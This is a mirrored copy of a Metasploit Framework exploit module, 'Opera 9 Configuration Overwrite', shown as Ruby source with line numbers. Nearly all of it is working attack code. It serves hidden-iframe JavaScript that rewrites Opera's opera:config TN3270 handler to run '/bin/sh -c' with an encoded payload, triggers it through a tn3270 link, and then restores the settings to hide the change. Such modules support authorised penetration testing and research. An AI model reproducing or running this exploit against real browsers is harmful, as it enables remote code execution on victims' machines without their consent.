Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/multi/browser/opera_configoverwrite.rb
19778 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  #

10
  # This module acts as an HTTP server

11
  #

12
  include Msf::Exploit::Remote::HttpServer::HTML

13


14
  include Msf::Exploit::Remote::BrowserAutopwn

15
  autopwn_info({

16
    :ua_name => HttpClients::OPERA,

17
    :ua_maxver => "9.10",

18
    :os_name => [ OperatingSystems::Match::WINDOWS, OperatingSystems::Match::LINUX ],

19
    :javascript => true,

20
    :rank => ExcellentRanking, # reliable cmd exec, cleans up after itself

21
    :vuln_test => nil,

22
  })

23


24
  def initialize(info = {})

25
    super(

26
      update_info(

27
        info,

28
        {

29
          'Name' => 'Opera 9 Configuration Overwrite',

30
          'Description' => %q{

31
            Opera web browser in versions <= 9.10 allows unrestricted script

32
            access to its configuration page, opera:config, allowing an

33
            attacker to change settings and potentially execute arbitrary

34
            code.

35
          },

36
          'License' => BSD_LICENSE,

37
          'Author' => [

38
            'egypt', # stolen from mpack

39
          ],

40
          'References' => [

41
            [ 'OSVDB', '66472'],

42
          ],

43
          'Payload' => {

44
            'EXITFUNC' => 'process',

45
            'Space' => 2048,

46
            'DisableNops' => true,

47
            'BadChars' => " ",

48
          },

49
          'Platform' => %w{unix},

50
          'Targets' => [

51
            # [ 'Opera < 9.10 Windows',

52
            #	{

53
            #		'Platform' => 'win',

54
            #		'Arch' => ARCH_X86,

55
            #	}

56
            # ],

57
            [

58
              'Opera < 9.10 Unix Cmd',

59
              {

60
                'Platform' => 'unix',

61
                'Arch' => ARCH_CMD,

62
              }

63
            ],

64
          ],

65
          # Not sure when this was disclosed but it's been known since at

66
          # least March 5, 2007, since that's the release date on the version

67
          # of mpack I stole this from.

68
          'DisclosureDate' => '2007-03-05',

69
          'DefaultTarget' => 0,

70
          'Notes' => {

71
            'Reliability' => UNKNOWN_RELIABILITY,

72
            'Stability' => UNKNOWN_STABILITY,

73
            'SideEffects' => UNKNOWN_SIDE_EFFECTS

74
          }

75
        }

76
      )

77
    )

78
  end

79


80
  def on_request_uri(cli, request)

81
    print_status("Got request #{request.uri}")

82


83
    case request.uri

84
    when get_resource

85
      print_status("Sending #{self.name}")

86
      content = "<body><script>"

87
      content << generate_evil_js(cli, request)

88
      content << "</script></body>"

89
      headers = { 'Content-Type' => 'text/html' }

90
    else

91
      print_status("404ing request for #{request.uri}")

92
      send_not_found(cli)

93
      return

94
    end

95
    send_response_html(cli, content, headers)

96


97
    print_status("Done with request #{request.uri}")

98
  end

99


100
  def generate_evil_js(cli, request)

101
    # There are a bunch of levels of quotes here, so the easiest way to

102
    # make everything line up is to hex escape the command to run

103
    p = regenerate_payload(cli).encoded

104
    send_not_found(cli) && return if not p

105


106
    shellcode = Rex::Text.to_hex(p, "%")

107
    js = <<~ENDJS

108
      blank_iframe = document.createElement('iframe');

109
      blank_iframe.src = 'about:blank';

110
      blank_iframe.setAttribute('id', 'blank_iframe_window');

111
      blank_iframe.setAttribute('style', 'display:none');

112
      document.body.appendChild(blank_iframe);

113
      blank_iframe_window.eval(

114
        "config_iframe = document.createElement('iframe');" +

115
        "config_iframe.setAttribute('id', 'config_iframe_window');" +

116
        "config_iframe.src = 'opera:config';" +

117
        "document.body.appendChild(config_iframe);" +

118
        "cache_iframe = document.createElement('iframe');" +

119
        "cache_iframe.src = 'opera:cache';" +

120
        "cache_iframe.onload = function ()" +

121
        "{" +

122
        "	config_iframe_window.eval" +

123
        "	(\\"" +

124
        "	old_handler = opera.getPreference('Network','TN3270 App');" +

125
        "	old_pref    = opera.getPreference('User Prefs','Run TN3270 In Terminal');" +

126
        "	shellcode = '#{shellcode}';" +

127
        "	opera.setPreference('Network','TN3270 App','/bin/sh -c ' + unescape(shellcode));" +

128
        "	opera.setPreference('User Prefs','Run TN3270 In Terminal','0');" +

129
        "	app_link = document.createElement('a');" +

130
        "	app_link.setAttribute('href', 'tn3270://#{Rex::Text.rand_text_alpha(rand(5) + 5)}');" +

131
        "	app_link.click();" +

132
        "	setTimeout(function () {opera.setPreference('Network','TN3270 App',old_handler)},1000);" +

133
        "	setTimeout(function () {opera.setPreference('User Prefs','Run TN3270 In Terminal',old_pref)},1000);" +

134
        "	\\");" +

135
        "};" +

136
        "document.body.appendChild(cache_iframe);" +

137
      "");

138
    ENDJS

139
  end

140
end

141


142